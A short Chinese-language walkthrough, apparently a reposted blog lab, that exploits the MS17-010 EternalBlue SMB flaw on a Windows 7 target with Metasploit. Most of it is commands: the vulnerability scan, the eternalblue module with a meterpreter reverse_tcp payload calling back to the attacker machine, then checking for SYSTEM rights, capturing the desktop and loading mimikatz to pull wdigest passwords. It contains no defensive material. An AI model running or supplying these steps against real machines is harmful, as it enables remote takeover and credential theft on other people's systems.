测试环境
靶机: Windows7 IP:192.168.5.90 开放445端口 关闭防火墙
攻击机:Windows10/kali IP:192.168.5.42
1、查询漏洞模块
search ms17-010
2、使用扫描模块扫描是否有永恒之蓝漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.5.90
set threads 1
exploit
扫描二维码关注公众号,回复:
11639499 查看本文章
可以看出存在该漏洞
3、使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.5.42
set rhosts 192.168.5.90
set rport 445
exploit
getuid 为系统权限 捕获桌面
load mimkatz 运行wdigest 获取密码
另外还有很多功能可使用。。。